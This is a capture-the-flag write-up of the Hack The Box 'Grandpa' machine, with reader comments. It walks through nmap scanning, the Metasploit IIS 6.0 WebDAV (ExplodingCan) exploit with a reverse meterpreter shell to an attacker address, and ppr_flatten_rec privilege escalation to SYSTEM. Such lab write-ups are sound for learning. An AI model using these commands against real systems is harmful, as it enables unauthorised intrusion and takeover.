Let’s get started!

Level: medium

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -O -oA grandpa 10.10.10.14

Enumerating Port 80

1. Browse to http://10.10.10.14

As we can see port 80 with IIS 6.0 running under it.

Let’s find some exploits for IIS we can see that it has a number of exploits. One we will use is this.

Here is a sample exploit for the above mentioned vulnerability.

Let’s use NMAP to check the exploit is vulnerable to this machine.

To create the NSE script, we need to copy the contents of this script

We need to create the script file inside the nmap scripts directory: 

/usr/share/nmap/scripts

COMMAND: nano iis-buffer-overflow.nse 

Run the iis-buffer-overflow NSE script

Now that the script has been created, lets see if the machine is vulnerable to this exploit: 

nmap –script iis-buffer-overflow 10.10.10.14

BOOM!

Now that we know the machine is vulnerable, lets now find a working exploit!

Initial Foothold and Priv Esc – Root 

ExplodingCan IIS 6.0 WebDAV BoF Exploit

ExplodingCan was an NSA made exploit that exploits WebDAV and IIS 6.0, I found this github page that details how the exploit works with a python script. 

I also found out that there is a metasploit exploit for this too, which i had to use as my shells for the python script always failed with netcat and multi/handler. 

So to exploit the vulnerability, im going to use the metasploit method: 

Find the exploit

Lets use the metasploit search function tro find the correct exploit: 

search explodingcan

show options

 use exploit/windows/iis/iis_webdav_scstoragepathfromurl 
 set rhosts 10.10.10.14
 set payload windows/meterpreter/reverse_tcp 
 set lhost 10.10.14.2
 set SESSION 1
 set lport 9002 
 run  

we got a shell which has access denied while accessing user flag.

let’s background the current and run another exploit which helps to bypass the permissions!

COMMAND: bg

Local Exploit Suggester 

Im going to use the inbuilt metasploit port exploitation module, Local Exploit Suggester to find a route to either Harry or Administrator. 

run post/multi/recon/local_exploit_suggester 

Exploiting ppr_flatten_rec 

So the machine looks to be possibly vulnerable to a few exploits, but we will concentrate on the bottom exploit: ppr_flatten_rec 

use exploit/windows/local/ppr_flatten_rec 

set session 1

set lhost 10.10.14.2

set lport 9003 

run 

After i run the exploit ,I faced some errors in which the exploit failed to run !

Let’s get into the previous session and migrate the process so we can run the exploit !

COMMAND: ps

So, i’m going to migrate process into davdata.exe.

COMMAND: migrate 2244

Running the exploit again

Now that we have migrated to a new process, lets run the exploit again: 

And the exploit works, we get a new meterpreter session as SYSTEM!

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

2 COMMENTS

  1. Hey Exp1o1t9r,

    could you explain to me how you figured out that you have to migrate to another process and why you chose davcdata? Btw your process did not work for me.. I had to migrate to w3wp – any idea why? Ressources welcome 🙂

    Thanks

    • First thing i need a stable metrepreter session and second thing tools are already available in various repositories.
      If you are familiar with those tools, you will know which tool to use by checking the version and when i exploited using meterpreter, connection got terminated while privilege escalation
      so i preferred to migrate into a process.So i choose davcdata.exe (YOU CAN CHOOSE ANY OTHER RUNNING PROCESS) as it was running as network service!!
      If you like my writeup, give respect to my Hackthebox profile

LEAVE A REPLY

Please enter your comment!
Please enter your name here